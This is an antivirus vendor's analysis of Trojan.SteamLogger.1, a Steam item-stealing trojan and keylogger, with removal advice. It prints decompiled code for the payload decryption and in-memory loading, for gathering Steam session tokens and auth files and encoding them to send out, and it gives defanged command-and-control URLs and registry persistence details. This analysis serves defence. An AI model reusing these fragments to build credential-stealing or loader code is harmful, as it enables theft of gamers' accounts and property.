Library
My library

+ Add to library

Profile

Trojan.SteamLogger.1

Added to the Dr.Web virus database: 2014-10-24

Virus description added:

This malicious program is designed to steal valuable game assets, tools, and artifacts from users of the Steam gaming platform, mostly from fans of Dota 2, Counter-Strike: Global Offensive, and Team Fortress 2.However, it can easily be tweaked to steal assets of other games. It also logs key strokes and transmits the information to criminals.

The Trojan consists of three modules: a dropper, a service module and the main module. When Trojan.SteamLogger.1 is executed, it decrypts and extracts the main and the service modules from its body. The decryption is performed in two steps:

  1. Reading an image into the memory with little modification:
    public static byte[] D(byte[] text)
    {
        byte[] array = new byte[text.Length];
        for (int i = 0; i < text.Length; i++)
        {
            array[i] = Convert.ToByte((int)text[i] - i - 27);
        }
        return array;
    }
    
  2. . Decrypting with AES algorithm:
    private static byte[] code = new byte[]  //AES key
    {
        149, 133, 127, 135, 145, 135, 134, 144, 147, 141, 159, 138, 136
    };
     
    public byte[] SymmetricDecrypt(byte[] input, byte[] key)
    {
        byte[] result;
        using (RijndaelManaged rijndaelManaged = new RijndaelManaged())
        {
            rijndaelManaged.BlockSize = 128;
            rijndaelManaged.KeySize = 256;
            byte[] array = new byte[16];
            byte[] rgbIV = new byte[array.Length];
            Array.Copy(input, 0, array, 0, array.Length);
            byte[] array2 = new byte[input.Length - array.Length];
            Array.Copy(input, array.Length, array2, 0, array2.Length);
            rijndaelManaged.Mode = CipherMode.ECB;
            rijndaelManaged.Padding = PaddingMode.None;
            using (ICryptoTransform cryptoTransform = rijndaelManaged.CreateDecryptor(key,
               null))
            {
                rgbIV = cryptoTransform.TransformFinalBlock(array, 0, array.Length);
            }
            rijndaelManaged.Mode = CipherMode.CBC;
            rijndaelManaged.Padding = PaddingMode.PKCS7;
            using (ICryptoTransform cryptoTransform2 = rijndaelManaged.CreateDecryptor(key, 
                rgbIV))
            {
                using (MemoryStream memoryStream = new MemoryStream(array2))
                {
                    using (CryptoStream cryptoStream = new CryptoStream(memoryStream, 
                     cryptoTransform2, CryptoStreamMode.Read))
                    {
                        byte[] array3 = new byte[array2.Length];
                        int num = cryptoStream.Read(array3, 0, array3.Length);
                        byte[] array4 = new byte[num];
                        Array.Copy(array3, 0, array4, 0, num);
                        result = array4;
                    }
                }
            }
        }
        return result;
    }
    

After decrypting, the dropper stores the service module in the %TEMP% folder as Update.exe and launches it, the main module is loaded into system memory by means of the Assembly.Load() routine:

Assembly assembly = Assembly.Load(array);
program.Invoke(assembly, assembly.EntryPoint);

Then, the malware loads the graphics file from hxxp://keys-trade.ru/trade/?image= and saves it to the infected computerinto the %TEMP% folder as %process_name%.jpg, after this immediately displays the image on the screen:

screen

The service module checks whether the folder %ProgramFiles%"+ " (x86)\Common Files\Steam\ is present and if it is not, the module creates it. After that, the module copies itself to this folder under the name SteamService.exe and sets the attributes for the executable as “system” and “hidden”, and then changes the key of the registry entry HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, responsible for launching applications automatically, and launches the service module.

Being loaded on an infected computer, the service module sends a request to the cybercriminals' command and control server by means of the POST method(hxxp://keys-trade.ru/bot/check="),and, if the instruction “OK” is not returned, it attempts to establish a connection to the command and control server via any of the proxy servers on its hardcoded list.

The Trojan transmits information about the infected computer to the command and control server at hxxp://keys-trade.ru/bot/. The data includes the operating system version, platform, as well as the unique malware's identifier, generated using the serial number of the hard disk that contains the C partition. In addition, in 50-minute intervals the Trojan sends the remote server a POST request, and upon receipt of a download instruction, the malware downloads and installs the updated version of the service module, by replacing the stored executable file in %TEMP%\Update.exe.

When launched, the Trojan's main module checks whether the command and control server is available and after initialization it searches the infected system memory for a Steam process and verifies whether the user has logged onto the Steam server under their account. If not, the malicious program waits for the server to authorize a player and then extracts information about the Steam account (the availability of SteamGuard, steam-id, security token) and sends the data to cybercriminals. Then the Trojan waits for the string containing data for the future transmission of game items from the compromised account. The string is as follows:

steam-id,partner,token|steam-id,partner,token|...

where steam-id, partner, token are parameters for the trade request.

After this, the Trojan searches for Steam files in the folder by means of the "ssfn*" mask and creates the following string:

ssfn_filename_1|ssfn_file1_data||ssfn_filename_2|ssfn_file2_data||...

extracts files stored in the config\ folder of the Steam application and generates the same string from these data. The Trojan than appends the generated string to the existing one and replaces the character set "-" with "". After that, the data of victim's account are appended to tend of the result string which is then encoded with the BASE64 algorithm:

text = text + "steamLogin.txt|" + this.ToStrByte(this._token) + "||";
text = text + "steamLoginSecure.txt|" + this.ToStrByte(this._login_secure) + "||";
string text6 = text;
text = string.Concat(new string[]
{
    text6,
    "steamMachineAuth",
    this._steam_id,
    ".txt|",
    this.ToStrByte(this._machine_auth)
});
byte[] inArray = this.Compress(Encoding.UTF8.GetBytes(text));
text = "steam_id=" + this._steam_id + "&receive=" + Convert.ToBase64String(inArray);

The malicious program gets a list of accounts to which game items from the compromised account can be transferred. All the collected data are sent to the criminals' server after which the Trojan checks whether automatic authorization is enabled in the Steam settings. If the feature is disabled, the malware creates a separate thread to run the keylogger. Information about logged key strokes will be sent to the attackers in 15-second intervals.

To search for the inventory and valuable in-game items, the Trojan uses the following filters:


private static int[] games = new int[]
{
    570,
    730,
    440
};
string[] source = new string[]
{
    "Mythical",
    "Legendary",
    "Arcana",
    "Immortal"
};
string[] source2 = new string[]
{
    "DOTA_WearableType_Treasure_Key"
};
string[] source3 = new string[]
{
    "Container",
    "Supply Crate"
};

The malware filters items for Dota 2, Counter Strike: Global Offensive and Team Fortress 2. In other words, the Trojan attempts to steal the most valuable in-game items, chests and chest keys. Trojan.SteamLogger.1 also monitors whether players attempt to sell any of the virtual items themselves, and if they do, it automatically removes the items from the sale dialog box. All the stolen virtual items are transferred to cybercriminals' accounts.

To sell Dota 2 chest keys, the malware authors have even created a special eStore:

screen

screen

News post about this threat

Curing recommendations

  1. If the operating system (OS) can be loaded (either normally or in safe mode), download Dr.Web Security Space and run a full scan of your computer and removable media you use. More about Dr.Web Security Space.
  2. If you cannot boot the OS, change the BIOS settings to boot your system from a CD or USB drive. Download the image of the emergency system repair disk Dr.Web® LiveDisk , mount it on a USB drive or burn it to a CD/DVD. After booting up with this media, run a full scan and cure all the detected threats.
Download Dr.Web

Download by serial number

Use Dr.Web Anti-virus for macOS to run a full scan of your Mac.

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Download Dr.Web

Download by serial number

  1. If the mobile device is operating normally, download and install Dr.Web for Android. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Load your smartphone or tablet in the safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install the Dr.Web for Android onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.

Find out more about Dr.Web for Android